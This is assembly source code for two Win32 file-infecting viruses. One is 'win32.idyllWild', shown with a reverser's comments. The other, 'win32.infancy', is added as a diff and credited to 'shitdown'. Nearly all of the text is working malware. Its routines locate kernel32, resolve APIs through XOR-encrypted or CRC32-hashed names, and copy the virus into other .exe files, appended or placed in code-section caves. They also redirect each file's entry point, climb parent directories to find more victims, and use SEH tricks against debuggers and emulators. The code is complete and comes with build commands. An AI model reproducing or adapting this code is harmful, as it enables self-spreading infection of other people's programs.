;tlink32 idyll,,,import32.lib /Tpe
;pewrsec idyll.exe
;
;
.386 ;the usual stuff
.model flat
extrn GetModuleHandleA:proc ;---\
; >virus needs these fns to be imported by host
extrn GetProcAddress:proc ;---/
extrn ExitProcess:proc
;
;struc def so no need of inc's
;
_find_data struc
_attr dd ?
_creatlo dd ?
_creathi dd ?
_lastalo dd ?
_lastahi dd ?
_lastwlo dd ?
_lastwhi dd ?
_sizehi dd ? ;@1C
_sizelo dd ? ;@20
_res0 dd ?
_res1 dd ?
_fname db 260 dup(?) ;@2C
_fuck db 10 dup (?) ;idyll allocates less than the real
_find_data ends ;size of finddata structure
.data
dd 0 ;tlink32 stuff
.code
host_start:
push 0
call ExitProcess
;
;we need some fixups like filling fn adds and encrypting api strings
;before starting the 1st generation sample
;
; This is where control is received from the loader... X-D
fixups:
mov eax,idyll_gmh ;getmodulehandle
mov eax,[eax] ;get dispatcher add
mov idyll_gmh,eax ;store it as virus does during
;infection
mov eax,idyll_gpa ;getprocaddress
mov eax,[eax]
mov idyll_gpa,eax ;do the same
mov esi,offset idyll_apinames ;ptr to apinames
mov ecx,idyll_length_of_apinames;# of bytes to crypt
fixup_xorloop:
xor byte ptr [esi],17h ;crypt byte
inc esi ;inc ptr
loop fixup_xorloop ;loop
jmp idyll ;launch virus
;the author (the false demon prophet) coded a host with 69h bytes of size
;i fix this with an org directive
org 69h
;
;----------------------- infective code begins here ----------------------------
;
idyll_start equ $
idyll_size equ idyll_end-idyll_start
;
;idyll main
;
idyll:
call idyll_flexible_entry_point ;will calculate delta offset
idyll_flexible_entry_point:
mov ebp,[esp] ;get offset from stack
sub ebp,offset idyll_flexible_entry_point ;fix ebp
add esp,4 ;perform pop off the stack
mov eax,[ebp+offset idyll_hostentry] ;entry point of host
lea edi,[ebp+idyll_hostentry_load] ;get add of instruction to patch
inc edi ;fix ptr (seems the author wasnt
; familiar with equ $-4 stuff)
mov [edi],eax ;patch code for return to host
mov edi,[ebp+offset idyll_gmh]
mov eax,[edi] ;get fn add
mov [ebp+idyll_getmodulehandlea_add],eax;store fn add
lea edi,[ebp+offset idyll_k32string] ;fetch ptr to 'KERNEL32' string
push edi ;pass param
call [ebp+idyll_getmodulehandlea_add] ;get a handle to KERNEL32.dll
mov [ebp+offset idyll_k32add],eax ;store it
mov edi,[ebp+offset idyll_gpa]
mov eax,[edi] ;get fn add
mov [ebp+idyll_getprocaddress_add],eax;store fn add
call idyll_xorloop_on_apinames ;decrypt api strings
call idyll_lookup_apis ;get fn addresses
call idyll_xorloop_on_apinames ;encrypt api strings
lea edi,[ebp+offset idyll_filemask] ;filemask for searches
call idyll_init ;init routines
cmp eax,-1 ;failed?
je idyll_hostentry_load ;yes abort
nop
nop ;nops for match
nop
nop
call idyll_infect ;try to infect
idyll_mainloop:
call idyll_findnext ;find next victim...
cmp eax,0 ;failed?
je idyll_hostentry_load ;if yes execute host
nop
nop
nop
nop
call idyll_infect ;otherwise infect
jmp idyll_mainloop ;and loop...
idyll_hostentry_load: ;@10F5
mov edi,0 ;this will be patched by virus
push edi ;store on TOS
ret ;jump to host
;
;allocate memory for finddata structure and call FindFirstFileA()
;
idyll_init: ;@1093(8293)
push edi ;store reg
push 4 ;acces protection:PAGE_READWRITE
push 1000h ;type of allocation:MEM_COMMIT
push size _find_data ;size of the region to allocate
push 0 ;address of region to reserve or commit
call [ebp+offset idyll_virtualalloc_add];call VirtualAlloc
mov [ebp+offset idyll_finddata_add],eax ;store add
pop edi
push eax
push edi
call [ebp+offset idyll_findfirstfilea_add] ;call FindFirstFileA()
mov [ebp+offset idyll_findhandle],eax ;store handle
ret
;
;launch FindNextFileA()
;
idyll_findnext:
mov eax,[ebp+offset idyll_finddata_add]
push eax ;store param
mov eax,[ebp+offset idyll_findhandle]
push eax ;store param
call [ebp+offset idyll_findnextfilea_add];call fn
ret ;back to caller
;
;infection routine
;
idyll_infect: ;@10D3
xor eax,eax
mov [ebp+offset idyll_sectsize],eax
call idyll_mapfile ;try to map file
cmp eax,0 ;failed?
je idyll_infect_return_failure
call idyll_testfile ;file can be infected?
test eax,eax ;eax zero if yes
jne idyll_infect_fail ;possibly already infected,abort
mov edi,[ebp+offset idyll_peheader] ;fetch PE header
add edi,78h ;start of RVA list
add edi,8 ;ptr to imports RVA
mov ebx,[edi] ;get value
call idyll_infect_findimports
mov esi,ebx
;
;scan imports for KERNEL32.dll module and GetModuleHandleA + GetProcAddress
;fns to patch virus before moving code into the victim
;
idyll_infect_importloop:
mov ebx,[esi+0ch]
call idyll_infect_findimports
mov edi,ebx
call idyll_infect_findk32
cmp eax,0
je idyll_infect_k32found
nop
nop
nop
nop
cmp byte ptr [edi],0 ;endmarker?
je idyll_infect_fail
add esi,14h ;next one..
jmp idyll_infect_importloop ;and branch
idyll_infect_k32found:
push esi
lea edi,[ebp+offset idyll_gmhstring] ;GetModuleHandleA string
mov ebx,[esi]
call idyll_infect_findimports ;find imports rva
mov ecx,16 ;size of gmh string
call idyll_infect_find_fn ;find fn
cmp eax,-1 ;failed?
pop esi
je idyll_infect_fail ;yes abort
mov edi,[esi+10h]
lea ebx,[eax*4]
add edi,ebx
xchg edi,ebx
mov edi,[ebp+offset idyll_peheader]
add ebx,[edi+34h] ;add imagebase
mov [ebp+offset idyll_gmh],ebx ;store add of GetModuleHandleA
push esi
lea edi,[ebp+offset idyll_gpastring] ;GetProcAddress string
mov ebx,[esi]
call idyll_infect_findimports
mov ecx,0eh ;size of string
call idyll_infect_find_fn
cmp eax,-1
pop esi
je idyll_infect_fail
mov edi,[esi+10h]
lea ebx,[eax*4]
add edi,ebx
xchg ebx,edi
mov edi,[ebp+offset idyll_peheader]
add ebx,[edi+34h] ;add imagebase
mov [ebp+offset idyll_gpa],ebx
mov edi,[ebp+offset idyll_peheader] ;needless
push edi
xor ecx,ecx
mov cx,[edi+6] ;get object count
dec cx ;counting starts from 1
mov esi,[ebp+offset idyll_1stsec] ;get ptr to 1st entry
idyll_infect_getlastentry:
add esi,40 ;size of each entry
loop idyll_infect_getlastentry ;get ptr to last entry
mov edx,[esi+0ch] ;get section RVA
add esi,16 ;esi points to PhysOffset
add edx,[esi] ;RVA+PhysOffset
push edx
mov ebx,[esi] ;PhysOffset of last section
mov edi,[ebp+offset idyll_peheader] ;needless again
mov eax,[edi+3ch] ;get file alignment unit
xor edx,edx ;zero reg
;
;increase section PhysSize by file alignment units
;until its larger than virus size
;
idyll_infect_fixsize:
add edx,eax ;add filealign
cmp edx,idyll_size ;virus size
jl idyll_infect_fixsize ;loop if section smaller than virus
mov eax,[esi+4]
add eax,[esi]
mov [ebp+offset idyll_sectsize],edx
add edx,ebx
mov [esi],edx ;set new PhysSize
mov [esi-8],edx ;set new VirtSize
pop edx
pop edi
push eax
mov ebx,[edi+28h] ;get entry RVA
add ebx,[edi+34h] ;add imagebase
mov [ebp+offset idyll_hostentry],ebx ;save restart address
mov [edi+28h],edx ;modify host entry RVA in PE header
mov edx,0e0000020h ;object flags:[CERW]
mov [esi+14h],edx ;set flags
call idyll_unmap_close ;unmap and close file
call idyll_mapfile ;
test eax,eax
je idyll_infect_fail
nop
nop
nop
nop
call idyll_testfile ;?
pop ebx
mov edi,[ebp+offset idyll_finddata_add] ;why?
lea esi,[ebp+offset idyll_start]
mov edi,[ebp+offset idyll_mappedadd]
push edi
add edi,ebx
mov ecx,idyll_size ;virus size
rep
movsb ;move virus into victim
pop edi
add edi,[edi+3ch] ;ptr to PE header
mov [edi+58h],'Wild' ;mark file infected
call idyll_unmap_close ;unmap and close file
idyll_infect_return_success:
mov eax,1 ;fucking waste of space to
ret ;return nonzero value
idyll_infect_fail:
call idyll_unmap_close
idyll_infect_return_failure:
xor eax,eax
ret
;
;subroutine to
;determine whether a file can be infected
;in: eax:va of mapped file
;out: eax:zero if file can be infected
;
idyll_testfile:
mov ebx,eax ;va of mapped file into ebx
cmp word ptr [ebx],'ZM' ;exe?
jne idyll_testfile_return_failure;nope abort
nop
nop
nop
nop
add eax,dword ptr [ebx+3ch] ;get ptr to PE header
mov [ebp+offset idyll_peheader],eax
xchg edi,eax ;load ptr into edi
cmp word ptr [edi],'EP' ;a PE?
jne idyll_testfile_return_failure;nope abort
nop
nop
nop
nop
cmp [edi+58h],'Wild' ;already infected?
je idyll_testfile_return_failure;yes abort
nop
nop
nop
nop
add edi,74h
mov ecx,[edi] ;number of interesting rva's
idyll_testfile_rva_loop:
add edi,8 ;skip item
loop idyll_testfile_rva_loop ;so we'll get a ptr to sectiontable
add edi,4
mov [ebp+offset idyll_1stsec],edi;store ptr to 1st entry in
;sectiontable
idyll_testfile_return_success:
xor eax,eax ;and return succes to caller
ret
idyll_testfile_return_failure:
xor eax,eax ;return failure to caller
dec eax
ret
;
;find a function in the victims imports
;(called when infecting to get GetModuleHandleA and GetProcAddress)
;
idyll_infect_find_fn: ;@12B0(84B0)
xor eax,eax
idyll_infect_find_fn_loop:
mov esi,[ebx+4*eax]
cmp esi,0 ;endmarker?
je idyll_infect_find_fn_return_failure
nop
nop
nop
nop
push ebx
mov ebx,esi
call idyll_infect_findimports
inc ebx
inc ebx
mov esi,ebx
pop ebx
push edi
push ecx
repz
cmpsb ;compare names
cmp ecx,0 ;found?
pop ecx
pop edi
je idyll_infect_find_fn_done ;yes
nop
nop
nop
nop
inc eax ;nope,loop
jmp idyll_infect_find_fn_loop
idyll_infect_find_fn_done:
ret
idyll_infect_find_fn_return_failure:
xor eax,eax ;return failure
dec eax
ret
;
;find KERNEL32 string in import module names list
;
idyll_infect_findk32: ;@12E2(84E2)
push edi
push esi
mov ecx,8 ;size of string
push ecx
lea esi,[ebp+offset idyll_dllnamebuffer] ;destination
push esi
;
;uppercase input.
;
idyll_infect_findk32_loop:
mov ah,[edi] ;get char
cmp ah,'a' ;lowercase?
jl idyll_infect_findk32_uppercase ;nope,store char
nop
nop
nop
nop
sub ah,32 ;convert to upper
idyll_infect_findk32_uppercase:
mov [esi],ah ;and store char
inc esi ;increase dest ptr
inc edi ;increase src ptr
loop idyll_infect_findk32_loop ;branch
pop esi ;get ptr back
pop ecx ;get str len back
lea edi,[ebp+offset idyll_k32string] ;ptr to 'KERNEL32' string
repz
cmpsb ;compare strings
mov eax,ecx ;eax hold return value,zero if K32 found
pop esi ;get regs back
pop edi
ret ;return to caller
;
;find the section that contains imports
;
idyll_infect_findimports: ;@1314(8514)
push edi
push ecx
push esi
push eax
mov edi,[ebp+offset idyll_peheader]
mov ecx,[edi+6] ;get object count..bug:oc is a 16bit value
mov esi,[ebp+offset idyll_1stsec] ;ptr to 1st entry in section table
idyll_infect_findimports_loop:
mov eax,[esi+0ch] ;fetch section RVA
cmp ebx,eax ;compare them
jle idyll_infect_findimports_found
nop
nop
nop
nop
add esi,28h ;next section
loop idyll_infect_findimports_loop ;loop
idyll_infect_findimports_found:
je idyll_infect_findimports_found_at_sectionstart
nop ;^
nop ;|
nop ;+--start of imports equals to start of some section?
nop
sub esi,28h ;nope,previous section...
idyll_infect_findimports_found_at_sectionstart:
mov eax,[esi+0ch] ;fetch section RVA
mov ecx,ebx
sub ecx,eax
mov ebx,[esi+14h] ;PhysOffset
add ebx,[ebp+offset idyll_mappedadd]
add ebx,ecx
pop eax
pop esi
pop ecx
pop edi
ret
;
;map the file into the processes address space
;
idyll_mapfile: ;@1357(8557)
mov edi,[ebp+offset idyll_finddata_add];ptr to finddata structure
add edi,2ch ;fix ptr to point to the name of the found file
push edi ;parameter for open
push 80h ;fileattribute normal
push edi ;param for setfileattr
call [ebp+offset idyll_setfileattributesa_add];call fn to set
;file attr to normal
test eax,eax ;failed?
je idyll_mapfile_return_failure ;yes abort
nop
nop
nop
nop
pop edi ;get ptr to filename back
push 0 ;no hTemplate
push 80h ;attribute normal
push 3 ;OPEN_EXISTING
push 0 ;no sa struct
push 0 ;prevents from being shared
push 0c0000000h ;r/w
push edi ;ptr to filename
call [ebp+offset idyll_createfilea_add] ;call CreateFileA()
mov [ebp+offset idyll_handle],eax ;store handle
cmp eax,-1 ;open failed?
je idyll_mapfile_return_failure ;yes abort
nop
nop
nop
nop
;
;now the file's opened..calculate the size of filemapping object
;and map file
;
mov edi,[ebp+offset idyll_finddata_add]
mov edx,[edi._sizelo]
mov ebx,[edi._sizehi]
add edx,[ebp+offset idyll_sectsize]
push 0 ;name of mapping object
push edx ;max size lo
push ebx ;max size hi
push 4 ;PAGE_READWRITE
push 0 ;no sa structure
push eax ;hFile to map
call [ebp+offset idyll_createfilemappinga_add]
mov [ebp+offset idyll_maphand],eax ;store hObject
test eax,eax ;failed?
je idyll_mapfile_return_failure ;yes abort
nop
nop
nop
nop
push 0 ;map entire file
push 0 ;from zero offset
push 0 ;from zero offset
push 2 ;r/w access
push eax ;hObject
call [ebp+offset idyll_mapviewoffile_add];call MapViewOfFile
mov [ebp+offset idyll_mappedadd],eax ;store add of mapped image
test eax,eax ;failed?
je idyll_mapfile_return_failure ;yes abort
nop
nop
nop
nop
ret ;return success(eax nonzero)
idyll_mapfile_return_failure:
xor eax,eax
ret
;
;unmap the file and close handles
;
idyll_unmap_close: ;@13EE(85EE)
mov eax,[ebp+offset idyll_mappedadd] ;address of mapped image
push eax ;sotre parameter
call [ebp+offset idyll_unmapviewoffile_add];unmap file
mov eax,[ebp+offset idyll_maphand] ;hObject
push eax ;store parameter
call [ebp+offset idyll_closehandle_add] ;close file mapping object
mov eax,[ebp+offset idyll_handle] ;hFile
push eax ;store parameter
call [ebp+offset idyll_closehandle_add] ;close file
ret ;return to motherfucking caller
;
;calls GetProcAddress to retrieve fn adds needed for infection
;
idyll_lookup_apis: ;@147F
lea edi,[ebp+offset idyll_apinames];strings of fn names
lea esi,[ebp+offset idyll_apiaddresses];room for fn addresses
idyll_lookup_apis_loop:
mov ax,[edi] ;fetch a word
cmp ax,0 ;end of apinames?
je idyll_lookup_apis_return ;yes return
nop ;nops for b2b match
nop
nop
nop
push esi ;store ptr
push edi ;pass fn add
mov eax,[ebp+offset idyll_k32add] ;hModule of KERNEL32
push eax ;pass param
mov esi,[ebp+offset idyll_getprocaddress_add];add of fn
call esi ;call GetProcAddress
pop esi ;get ptr back
mov [esi],eax ;store fn add
add esi,4 ;fix ptr
xor al,al ;zero reg
or ecx,-1 ;ecx contains 0xFFFFFFFF
inc edi ;inc ptr
repnz ;find end of string (null)
scasb
jmp idyll_lookup_apis_loop;proceed with next fn
idyll_lookup_apis_return:
ret
;
;data needed on virus startup
;
idyll_k32string db 'KERNEL32',0 ;@14BA
idyll_k32add dd 0 ;address of KERNEL32.dll @14C3
;
;these fields are filled during infection and must be fixed
;before executing the 1st generation of the virus
;***note:this makes the whole stuff tasm/tlink dependent
;
idyll_gmh dd offset GetModuleHandleA+2 ;@14C7 GetModuleHandleA
idyll_gpa dd offset GetProcAddress+2 ;@14CB GetProcaddress
dd 0 ;@14CF
dd 0 ;
idyll_gmhstring db 'GetModuleHandleA',0 ;@14D7
idyll_gpastring db 'GetProcAddress',0 ;@14E8
idyll_getmodulehandlea_add dd 0 ;@14F7 fn address
idyll_getprocaddress_add dd 0 ;@14FB fn address
;
;encrypt/decrypt api names
;(i always get wired when i see motherfucking mixing of motherfucking code
;and motherfucking data motherfucking areas motherfucking)
;
idyll_xorloop_on_apinames: ;@14FF
lea esi,[ebp+offset idyll_apinames];ptr to string to crypt
mov ecx,idyll_length_of_apinames;amount to crypt
idyll_xorloop_on_apinames_loop:
mov ah,[esi] ;get byte
xor ah,17h ;crypt byte
mov [esi],ah ;store byte
inc esi ;inc ptr
dec ecx ;has the author heard of the 'loop'
jne idyll_xorloop_on_apinames_loop ;instruction of the x86's?
ret
;
;data related to idyll
;
idyll_length_of_apinames equ idyll_endof_apinames-idyll_apinames
;
;names of functions virus uses for infection
;
idyll_apinames equ $
db 'CreateFileA',0
db 'CreateFileMappingA',0
db 'MapViewOfFile',0
db 'UnmapViewOfFile',0
db 'CloseHandle',0
db 'VirtualAlloc',0
db 'VirtualFree',0
db 'FindFirstFileA',0
db 'FindNextFileA',0
db 'SetFileAttributesA',0
db 'GetLastError',0
dw 0 ;endmarker
idyll_endof_apinames equ $
;
;api adds will be stored here
;
idyll_apiaddresses equ $
idyll_createfilea_add dd 0 ;@15B7
idyll_createfilemappinga_add dd 0
idyll_mapviewoffile_add dd 0
idyll_unmapviewoffile_add dd 0
idyll_closehandle_add dd 0
idyll_virtualalloc_add dd 0
idyll_virtualfree_add dd 0
idyll_findfirstfilea_add dd 0
idyll_findnextfilea_add dd 0
idyll_setfileattributesa_add dd 0
idyll_getlasterror_add dd 0
idyll_hostentry dd offset host_start ;host erva @15E3
idyll_filemask db '*.exe',0 ;filemask for searches @15E7
idyll_findhandle dd 0 ;@15ED handle for file searches
idyll_finddata_add dd 0 ;@15F1 address of finddata structure
idyll_handle dd 0 ;@15F5 handle of open file
idyll_maphand dd 0 ;@15F9 handle of file mapping object
idyll_mappedadd dd 0 ;@15FD address of mapped file
idyll_peheader dd 0 ;@1601 ptr to PE header
idyll_1stsec dd 0 ;@1605 ptr to 1st entry in object table
idyll_sectsize dd 0 ;@1609
idyll_x dd 0 ;@160D
idyll_dllnamebuffer db 20 dup(0) ;@1611
idyll_text db '[win32.idyllWild]',10,13
db 'take me in your arms of velvet...',10,13
db 'kiss me with satin...',10,13
db 'drown me.',10,13
idyll_end equ $
end fixups ;we will start fixup routine first
+565
@@ -0,0 +1,565 @@
;????????????????????????????????????????????????????????????????????????????»
;? win32.infancy (c)oded by shitdown [mions] in feb-18-2001, alfa version ?
;? non-dangerous, non-resident pe cavity ring3 direct-action infector ?
;?????????????????????????????????????????????????????????????????????????????
;? this code is optimised for size by technique, not by asm :( ?
;?????????????????????????????????????????????????????????????????????????????
;?????????????????????????????????????????????????????????????????????????????
;? description:? ?
;??????????????? ?
;? name : win32.infancy (win32 teoretically, tested on win98 :-) ?
;? author : shitdown (http://shitdown.sf.cz, email: shitdown@sf.cz) ?
;? origin : czech republic ?
;? size : 540 bytes ?
;? infects : .exe pe files ?
;? payload : no ?
;? strings : no ?
;? encrypt : no ?
;? resident : no ?
;? cavity : yes ?
;? anti-debug : yes, 0cch api callgate fucks td32 ?
;? anti-emu : yes,non-standard playing with seh ?
;? anti-av : no ?
;?????????????????????????????????????????????????????????????????????????????
;? simple example tiny virus, shows how to use ?
;? structured exception handling ?
;? kernel is determined by standard way (pop eax/push eax) ?
;? at start, apis is located at fly (when is needed) ?
;? ( push crc32 of api / int 3 ) - crc32 api names, ?
;? virus can be easy detected / cleaned by generic scaner ?
;? virus doesn't needs write permission to section - ?
;? - all variables will be allocated dynamically on stack ?
;? virus searches & infects all files in 10 up-directories; ?
;? (cd .. / infect_all, cd .. / infect_all :) ?
;? this cute code is designed to use 'holes' in code ?
;? section, virus doesn't increase host size. ?
;? this code is not purposed to be world-wide :) ?
;? so, only for study purposes. ?
;? ?
;?how to compile: ?
;? tasm32 -ml -m9 -q -zn -z infancy.asm ?
;? tlink32 -r -m -s -M -Tpe -c -ap infancy.obj ?
;?how to debug: ?
;? set 'softice' definition to '1', compile, go to softice and type ?
;?'i1here on' and run infancy.exe file. ?
;???????????????????????????????? ?
;?fuck the windows, linux rocks!? ?
;?????????????????????????????????????????????????????????????????????????????
.386p ;nice machines :)
.model flat ;why ? why not !
softice = 0
dir_depth = 10 ;10 up-directories
.data
dummy dd ?
; ?????????????????
;??????????????????????????? needed macroz ???????????????????????????????????
; ?????????????????
;
;???????????????
;? crc32 macro ?
;???????????????
crc32_magic = 0c1a7f39ah
crc32 macro string
crcreg = 0ffffffffh
irpc _x, <string>
ctrlbyte = ('&_x&' and 0dfh) xor (crcreg and 0ffh)
crcreg = crcreg shr 8
rept 8
ctrlbyte = (ctrlbyte shr 1) xor (crc32_magic * (ctrlbyte and 1))
endm
crcreg = crcreg xor ctrlbyte
endm
dd crcreg
endm
;??????????????????
;? api call macro ?
;??????????????????
api macro apiname
db 68h
crc32 <apiname>
db 0cch
endm
;????????????????????????????
;? softice breakpoint macro ?
;????????????????????????????
break macro
if softice
int 01
endif
endm
; ????????????????????????????
;???????????????????????? here starts code section ???????????????????????????
; ????????????????????????????
.code
go:
virus_start:
;??????????????????????????????????????????????????????
;? try to get kernel address, using 'standard' method ?
;? pop eax / push eax, function is protected by seh ?
;??????????????????????????????????????????????????????
pop eax ;kernel address
push eax ;to eax
xor ax, ax
k32_scan_next:
push eax ;for restorin'
;by seh
call set_k32_scan_seh
k32_scan_seh:
pop ecx ;esp+8
pop ecx
pop esp ;mov esp, [esp+8]
k32_scan_mismatch:
pop ecx ;remove old seh
pop ecx
pop eax ;restore last
;kernel address
add eax, 0-10000h
jmp short k32_scan_next ;try again
set_k32_scan_seh:
xor ecx, ecx
push ecx
mov dword ptr fs:[ecx], esp
cmp word ptr [eax], 5a4dh
jne short k32_scan_mismatch
k32_found:
pop eax ;remove old seh
pop ecx
pop ebp
;?????????????????????? create handler for virus-services ?????????????????????
call get_handler_offset
;????????????????????????????????????????????????????????????????????
;? here is an entrypoint of exception gate, if any exception occurs ?
;? (including 0cch opcode call), this code will be executed ?
;????????????????????????????????????????????????????????????????????
exception_handler:
pushad ;save all registerz
mov esi, [esp+4+20h] ;exception code
lodsb ;exception number
cmp al, 3 ;virus request ?
je short exception_virus_request ;yah
;????????????????????????????????????????????????????????????????
;? only handled exception is int 0x3 - virus api gateway, other ?
;? exceptions is page faults, invalid opcodes etc, then virus ?
;? tryes jump to original host ?
;????????????????????????????????????????????????????????????????
other_exception:
break
mov esp, [esp+8+20h]
pop eax ;remove old seh handler
pop eax
call get_eip
get_eip:
db 81h, 2ch, 24h ;sub [esp], old_host
old_host dd -((offset fake_host-offset go)-(offset get_eip-offset go))
ret
;??? virus interrupt / request
exception_virus_request:
mov esi, [esp+0ch+20h] ;context-block
add esi, 0b4h ;pointer
lodsd ;to saved ebp
xchg eax, ebp ;ebp-base of kernel
mov edi, esi ;for edi storing
lodsd ;load eip to eax
xchg eax, esi ;in esi is eip
;??? fix win9x bug
lodsb
cmp al, 0cch
je short no_w9x_bug
dec esi
no_w9x_bug:
;???????????????????????????????????????????
;? in esi is return addres (after int 03h) ?
;? in edi is pointer to stack stored eip ?
;???????????????????????????????????????????
mov ebx, [edi+12] ;esi points to dword on stack
xchg [ebx], esi ;xchange crc32 <> return addr
mov ebx, esi ; :( crc32 to ebx
;?????????????????????????????????????????
;? okay, now i must call those crazy api ?
;? in ebp is kernel address ?
;?????????????????????????????????????????
mov esi, [ebp+3ch] ;pe header to esi
mov esi, [esi+ebp+78h] ;export table to esi
lea esi, [esi+ebp+1ch] ;offset of 'address table'
lodsd ;address table
push eax ;save 'address table'
lodsd ;name table to eax
push esi ;save pointer to ordinal table
lea esi, [eax+ebp]
mov ecx, ebp ;counter of api
try_next_api_name:
lodsd ;in eax pointer to string
add eax, ebp
;???? crc32 code ?????????????????????????????????????????????????????????????
;? ? input: eax - offset to name ? ?
; ? output:edx - crc32 ?
; ???????????????????????????????
get_crc32:
push esi
xchg eax, esi
xor edx, edx
dec edx
crc_next_byte:
lodsb
and al, 0dfh ;i hate uppercase :)
jz short crc_finish
xor dl, al
mov al, 08h
crc_next_bit:
shr edx, 01h
jnc short crc_no_change
xor edx, crc32_magic
crc_no_change:
dec al
jnz short crc_next_bit
jmp short crc_next_byte
crc_finish:
pop esi
;? ?
;?????????????????????????????? end of crc32 ?????????????????????????????????
inc ecx
inc ecx
cmp edx, ebx ;hit ?
jne short try_next_api_name
;????????????????????????????????????????????
;? yahooo, api hit! ?
;? in ecx is api index (starting from 1 !!) ?
;????????????????????????????????????????????
pop esi ;restore *ordinal_table
lodsd ;in eax pointer to ordinal table
movzx ecx, word ptr [eax+ecx-2] ;in ecx is now ordinal (0..x)
pop eax ;in esi is ptr address table
add eax, ebp
mov eax, [ecx*4+eax] ;and jump to api :)
add eax, ebp
stosd
popad
xor eax, eax
ret
;? ?
;???????????????????????????? end of virus-handler ???????????????????????????
;????????????????????????? here starts infection engine ??????????????????????
;? ?
infect:
xor esi, esi
lea ebx, [esp+44+2*4] ;filename to ebx
;??? at first, i must open file for read & write
push esi ;file attributes
push esi ;""
push 3 ;open existing
push esi ;security=default
push esi ;no sharing
push 0c0000000h ;generic read & write
push ebx ;file name
api <createfilea> ;open!
inc eax ;-1+1=0 ?
jnz short infect_continue
retn
infect_continue: ; yes, this is error
dec eax ; handle to eax
push eax ;save for future use
;??? now create file mapping
push esi ;no filename handle
push dword ptr [esp+32+4*4] ;maximal size of file
push esi ;no min. size
push 4 ;page read & write
push esi ;no security
push eax ;mapped file handle
api <createfilemappinga>
push eax ;save for future use
;??? and map file to memory
push dword ptr [esp+32+4*4] ;count of bytes to map
push esi ;blah...
push esi ;
push 2 ;read & write
push eax ;map-handle
api <mapviewoffile>
;??? yahoo, in eax is mapped file
mov ebx, eax
cmp word ptr [eax], 5a4dh ;exe file ?
jne short @unmap_file
cmp word ptr [eax+18h], 0040h
@unmap_file:
jne short @@unmap_file
add ebx, [eax+3ch]
cmp word ptr [ebx], 4550h ;is this pe header ?
@@unmap_file: jne short unmap_file ;no
xchg edx, eax ;imagebase to edx
push ebx ;save pe header
break
movzx eax, word ptr [ebx+14h]
add ebx, eax
test byte ptr [ebx+18h+24h], 20h ;executable ?
jz short _unmap_file ;no :(
code_section_found:
;??? okay, in ebx+18h is section record
break
mov ecx, dword ptr [ebx+18h+10h] ;raw_size
cmp ecx, dword ptr [ebx+18h+08h] ;raw_size>virtual size ?
jc short _unmap_file ;raw size too small, go away
mov esi, [ebx+18h+14h] ;raw address of section in esi
add esi, edx ;esi points to start of .code
mov eax, [ebx+18h+0ch] ;relative virt. addr to eax
;????????????????????????????????????????????????????????????????????
;? esi - pointer to code, ecx - count of bytes left, edi - counter ?
;? eax - offset of cave (rva) ?
;????????????????????????????????????????????????????????????????????
;???? current stack dump ????????????????????»
;? [esp] ? memory mapped pe header ?
;? [esp+4] ? map handle ?
;? [esp+8] ? file handle ?
;? [esp+12] ? offset of after_infect: label ?
;? [esp+16] ? file search handle ?
;? [esp+20] ? start of win32_find_data ?
;? [esp+48] ? 100% null-filled 4bytes :)) ?
;?????????????????????????????????????????????
; push dword ptr [ebx+0ch+18h] ;save virtual addr
; mov dword ptr [esp+20], [ebx+0ch+18h]
xor edi, edi
hole_mismatch:
add [esp+48], edi
add esi, edi
xor edi, edi
push esi ;save address
holes_search:
dec ecx
pop eax ;clean stack
js short _unmap_file
push eax
inc edi ;counter of found bytes
lodsb
test al, al
jz short holes_search
cmp al, 0cch
jz short holes_search
cmp al, 0c3h
jz short holes_search
hole_end:
db 66h, 81h, 0ffh ;cmp di, virus_size
dw virus_size+4
pop esi ;restore saved address
jc short hole_mismatch ;no :(
break
hole_found:
lodsd
;??????????????????????????????????????????????????????
;? yah, in stack is rva of cave, in esi cave address ?
;? in edi size of cave ?
;??????????????????????????????????????????????????????
; push dword ptr [ebx+18h+10h] ;raw size
; pop dword ptr [ebx+18h+08h] ;=virtual size
mov edi, esi ;in edi offset of cave
mov esi, [esp+12] ;offset infect to esi
sub esi, offset after_infect - offset go ;offset of go to esi
; push esi
mov ecx, virus_size ;virus size to ecx
rep movsb ;and move the virus !!
; pop esi ;in esi offset of infect:
;??? in edi is offset virus_end
sub edi, virus_end-old_host
mov ecx, [esp+48] ;addres relative to cave
lea ecx, [ecx+4]
add ecx, [ebx+0ch+18h] ;rva of section
pop ebx ;pe header in ebx
lea eax, [ecx+get_eip-go]
xchg [ebx+28h], ecx ;set entrypoint to virus
sub eax, ecx
;?????????????????????????????????????????????????????????????????????
;? old_host = rva_of_virus+(offset get_eip-offset go)-entrypoint_rva ?
;?????????????????????????????????????????????????????????????????????
stosd ;and store return adress
push eax
_unmap_file:
xchg edx, eax
pop ecx ;remove shit (pe header)
;unmaps file, in eax must be address of mapped file
unmap_file:
push eax
api <unmapviewoffile>
db 0bbh ;mov ebx, crc32 <closehandle>
crc32 <closehandle>
push ebx
db 0cch ;close mapping handle
pop edi
lea esi, [esp+20+2*4]
push esi
sub esi, 8
push esi
sub esi, 8
push esi
push edi
api <setfiletime>
push edi
push ebx
db 0cch ;close file handle
push 21h ;make file read-only
add esi, 40h
push esi
api <setfileattributesa>
unmap_file_end:
infect_file_end:
retn
infect_end:
;? old_host = rva_of_virus+(offset get_eip-offset go)-entrypoint_rva ?
;?????????????????????????? here ends infection engine ???????????????????????
get_handler_offset:
;--- setup handler for virus services / exeption handling
break
push eax
mov dword ptr fs:[eax], esp
push dir_depth
mov ah, 2 ;512
sub esp, eax ;place for old directory
push esp ;buffer offset
push eax ;buffer len
xchg eax, ebx
api <getcurrentdirectorya>
;???????????????????????????????????????????????????????
;? main infection routine: ?
;? searches for *.exe and for ..\*.exe and infect them ?
;???????????????????????????????????????????????????????
sub esp, ebx ;size of (ffdata)
find_first:
push esp ;offset of data buffer
call get_mask
db "*.exe", 0
get_mask:
api <findfirstfilea>
dir_search:
push eax ;save search handle
call infect
after_infect:
pop esi
push esp
push esi
api <findnextfilea>
dec eax
xchg eax, esi
jz short dir_search
next_directory:
push eax
api <findclose> ;close search handle
mov dword ptr [esp], '..'
push esp
db 0bbh
crc32 <setcurrentdirectorya>
push ebx
db 0cch
; api <setcurrentdirectorya> ;go to next up directory
dec dword ptr [esp+1024]
jnz short find_first
cdq ;edx=0
mov dh, 2
add esp, edx
push esp
push ebx
db 0cch
; api <setcurrentdirectorya>
int 4
virus_end:
virus_size = $-virus_start
;???????????????????
;?end of virus game?
;???????????????????
; ??????????????????
;??????????????????????????????? fake host part ??????????????????????????????
; ??????????????????
msg:
db "win32.infancy."
db '0'+virus_size/100 mod 10
db '0'+virus_size/10 mod 10
db '0'+virus_size mod 10
